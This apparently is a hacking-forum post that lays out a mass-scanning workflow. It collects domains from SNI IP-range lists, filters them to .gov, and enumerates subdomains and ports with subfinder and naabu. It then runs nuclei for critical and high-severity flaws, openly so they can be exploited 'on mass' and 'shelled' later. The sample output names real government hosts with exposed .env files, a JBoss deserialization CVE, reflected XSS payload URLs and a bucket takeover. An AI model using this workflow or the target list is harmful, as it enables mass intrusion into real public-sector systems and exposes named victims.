Here we mass subdomain, port and vuln scan domains/subdomains for vulnerabilities to later exploit on mass.
Tools:
1. https://github.com/projectdiscovery/subfinder
2. https://github.com/projectdiscovery/naabu
3. https://github.com/projectdiscovery/nuclei
4. https://kaeferjaeger.gay/?dir=sni-ip-ranges
Download domains
You can either scan the internet using zmap, then use zgrab to grab domains and then proceed to grep out all the domains and use that or you can visit https://kaeferjaeger.gay/?dir=sni-ip-ranges and download all of those and grep the domains yourself. However the list only uses popular cloud providers such as Google, Digital Ocean, Microsoft, Amazon and Oracle.
Grep domains
It's better to output all *.txt into one big file and then grep that file:
Grep for specific TLDs such as .gov
Filter down the list of domains for specific TLDs:
Enumerate subdomains
For a more comprehensive scan enumerate all domains for their subdomains:
Port scan domains
For an even more comprehensive scan port scan the domains before vuln scanning them:
Vulnerability scan hosts file for critical and high severity vulns only
Finally vuln scan the domains and wait a while. We specify critical and high severity vulnerabilities to later shell:
Sample output:
Tools:
1. https://github.com/projectdiscovery/subfinder
2. https://github.com/projectdiscovery/naabu
3. https://github.com/projectdiscovery/nuclei
4. https://kaeferjaeger.gay/?dir=sni-ip-ranges
Download domains
You can either scan the internet using zmap, then use zgrab to grab domains and then proceed to grep out all the domains and use that or you can visit https://kaeferjaeger.gay/?dir=sni-ip-ranges and download all of those and grep the domains yourself. However the list only uses popular cloud providers such as Google, Digital Ocean, Microsoft, Amazon and Oracle.
Grep domains
It's better to output all *.txt into one big file and then grep that file:
cd ~/sni_ip_ranges; cat *.txt > phatboi.txt
Код:
grep -E -o '[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+(\.[a-zA-Z]{2,})' ~/sni_ip_ranges/phatboi.txt > domains.txtGrep for specific TLDs such as .gov
Filter down the list of domains for specific TLDs:
Код:
grep -i '\.gov$' domains.txt > gov_domains.txtEnumerate subdomains
For a more comprehensive scan enumerate all domains for their subdomains:
Код:
subfinder -dL gov_domains.txt -silent -o government_domains.txtPort scan domains
For an even more comprehensive scan port scan the domains before vuln scanning them:
Код:
naabu -l government_domains.txt -silent -o government_domains_final.txtVulnerability scan hosts file for critical and high severity vulns only
Finally vuln scan the domains and wait a while. We specify critical and high severity vulnerabilities to later shell:
Код:
nuclei -l government_domains_final.txt -s critical,high -silent -o vuln_gov_domains.txtSample output:
Код:
[CVE-2017-12149] [http] [critical] https://coc-staging.egovernments.org/invoker/JMXInvokerServlet/
[CVE-2017-12149] [http] [critical] https://coc-staging.egovernments.org/invoker/EJBInvokerServlet/
[CVE-2017-12149] [http] [critical] https://coc-staging.egovernments.org/invoker/readonly
[codeigniter-env] [http] [high] https://bluez1.egovernance.io/.env
[codeigniter-env] [http] [high] https://bluez1.egovernance.io/.env.example
[travis-ci-disclosure] [http] [high] https://bneo.lga.gov.ph/.travis.yml
[travis-ci-disclosure] [http] [high] https://moodle.ebserh.gov.br/.travis.yml
[travis-ci-disclosure] [http] [high] https://neo.lga.gov.ph/.travis.yml
[travis-ci-disclosure] [http] [high] https://old.neo.lga.gov.ph/.travis.yml
[travis-ci-disclosure] [http] [high] https://pma.admin.6sigmagovernance.com/.travis.yml
[aws-bucket-takeover] [http] [high] https://traderemedies.gov.uk [traderemedies.gov.uk]
[codeigniter-env] [http] [high] https://ecidade.saoborja.rs.gov.br/.env
[codeigniter-env] [http] [high] https://ecidade.bage.rs.gov.br/.env.example
[codeigniter-env] [http] [high] https://ecidade.charqueadas.rs.gov.br/.env.example
[codeigniter-env] [http] [high] https://ecidade.campinagrande.pb.gov.br/.env.example
[codeigniter-env] [http] [high] https://ecidade.saoborja.rs.gov.br/.env.example
[top-xss-params] [http] [high] https://blagoveschensk.apteki.me/?action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E
[top-xss-params] [http] [high] https://dev-fdsearch.tax.ohio.gov/?action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E
[top-xss-params] [http] [high] https://fdsearch.tax.ohio.gov/?action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E
[top-xss-params] [http] [high] https://hackerspace.govhack.org/?action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E
Последнее редактирование:
